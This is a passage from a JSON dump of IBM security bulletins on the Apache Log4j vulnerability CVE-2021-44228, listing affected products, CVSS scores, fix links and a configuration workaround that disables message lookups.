Family: Maintenance for TPF Operations Server](<https://www.ibm.com/support/pages/node/598325> \"TPF Product Family: Maintenance for TPF Operations Server\" ) web page. \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T20:53:23", "type": "ibm", "title": "Security Bulletin: The Apache Log4j (CVE-2021-44228) vulnerability affects z/TPF and TPF Operations Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T20:53:23", "id": "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "href": "https://www.ibm.com/support/pages/node/6528436", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:08", "description": "## Summary\n\nApache Log4j is used by IBM Sterling Control Center. This bulletin provides fixes for the reported CVE-2021-44228 and work around mitigation. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Control Center| 6.1.3.0 to iFix07 \nIBM Control Center| 6.2.1.0 to iFix01 \nIBM Control Center| 6.2.0.0 to iFix11 \n \n\n\n## Remediation/Fixes\n\n**Product** | \n\n**VRMF**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0.\n\n| \n\niFix02\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix12\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.1.3.0\n\n| \n\niFix08\n\n| \n\n[Fix Central - 6.1.3.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.1.3.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\n## Resolving The Problem\n\nApply the latest iFix for 6.1.3.0, 6.2.0.0, 6.2.1.0 from IBM Fix Central when they are released. \n\nWork around till fix is applied, or for older versions were fixes are no longer made.\n\n**IBM Sterling Control Center**\n\n**Instructions to mitigate CVE-2021-44228 zero day log4j2 vulnerability**\n\nSpecify the following system property to the files listed below, then restart Control Center:\n\n**-Dlog4j2.formatMsgNoLookups=true **\n\n**====================================================== **\n\n**Unix: **&lt;install&gt;/bin/**runEngine.sh**\n\nAdd the following line to the grouping beginning with \u201cJAVA_SYSTEM_VAR=\u201d \n\nJAVA_SYSTEM_VAR=\"$JAVA_SYSTEM_VAR -Dlog4j2.formatMsgNoLookups=true \"\n\n**====================================================== **\n\n**Windows: **&lt;install&gt;/bin/**runEngine$.lax**\n\nAdd the property to the **lax.nl.java.option.additional** section as follows:\n\n**lax.nl.java.option.additional**=-server -Xbootclasspath/p: -XX:+UseParallelGC -XX:+HeapDumpOnOutOfMemoryError -Xms256m -Xmx4096m -Dopenjpa.DynamicEnhancementAgent=false -Djava.util.Arrays.useLegacyMergeSort=true -Dfile.encoding=UTF-8 -Dlog4j.debug=false -Djava.util.logging.config.file=../conf/javalogging.properties -Dlog4j.defaultInitOverride=true -Dlog4j.configurationFile=../conf/EngineLogger.xml -DBrowserAgent=true -DCONFIG_DIR=../conf -DADD_ACTIVE_ALERTS_TO_DB_USING_OPENJPA=true -DLAUNCH_MODE=service -Djava.security.properties=../conf/CC_java.security -Djava.net.preferIPv4Stack=true **-Dlog4j2.formatMsgNoLookups=true**\n\n========================================================= \n\nControl Center 6.2.x\n\n&lt;install&gt;/web/ccbase**/start.ini**\n\nAdd the following line: **-Dlog4j2.formatMsgNoLookups=true **\n\n========================================================== \n\nControl Center 6.1.x (and earlier)\n\n&lt;install&gt;/web/wlp/usr/servers/defaultServer/**jvm.options**\n\nAdd the following line: **-Dlog4j2.formatMsgNoLookups=true **\n\n=========================================================== \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:27:06", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T18:27:06", "id": "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "href": "https://www.ibm.com/support/pages/node/6527966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:12", "description": "## Summary\n\nLog4j 2 is a logging package used by IBM Security Guardium Data Encryption (GDE). That package has a security vulnerability. Consult the bulletin listed below for details.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product| Affected Component Name | Affected Version \n---|---|--- \nGDE (4.0.0.6)| Guardium Bulk Data Transformation (GBDT)| 2.3 \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance| 1.10.0, 1.10.1 \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance| 1.9 \n \n\n\n## Remediation/Fixes\n\nFor mitigation plan/status/patch, please check the Security Bulletin by Thales. Customers are encouraged to act quickly to update their systems. \n\nNote: User need to log into the Thales's support portal for accessing the below link\n\nAffected Product| Affected Component Name | Fixes \n---|---|--- \nGDE (4.0.0.6)| Guardium Bulk Data Transformation (GBDT)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=87565617db5441105d310573f396194b&amp;sysparm_article=KB0025295](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=87565617db5441105d310573f396194b&sysparm_article=KB0025295>) \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&amp;sysparm_article=KB0025308](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&sysparm_article=KB0025308>) \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&amp;sysparm_article=KB0025308](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&sysparm_article=KB0025308>) \n \n## Workarounds and Mitigations\n\nFor mitigation plan/status/patch, please check the Security Bulletin by Thales. Customers are encouraged to act quickly to update their systems. \n\nNote: User need to log into the Thales's support portal for accessing the below link\n\nAffected Product| Affected Component Name | Mitigation plan \n---|---|--- \nGDE (4.0.0.6)| Guardium Bulk Data Transformation (GBDT)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=87565617db5441105d310573f396194b&amp;sysparm_article=KB0025295](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=87565617db5441105d310573f396194b&sysparm_article=KB0025295>) \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&amp;sysparm_article=KB0025308](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&sysparm_article=KB0025308>) \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&amp;sysparm_article=KB0025308](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1e0d4fafdb9c0110f0e3220805961928&sysparm_article=KB0025308>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T04:50:43", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Log4j 2 used in IBM Guardium Data Encryption (GDE) (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T04:50:43", "id": "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "href": "https://www.ibm.com/support/pages/node/6528290", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:13:28", "description": "## Summary\n\nThis Security Alert addresses CVE-2021-44228, a vulnerability in Apache Log4j. Versions Affected: All Apache Log4j2 &lt;=2.14.1 on IBM Informix Dynamic Server in Cloud Pak for Data\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabi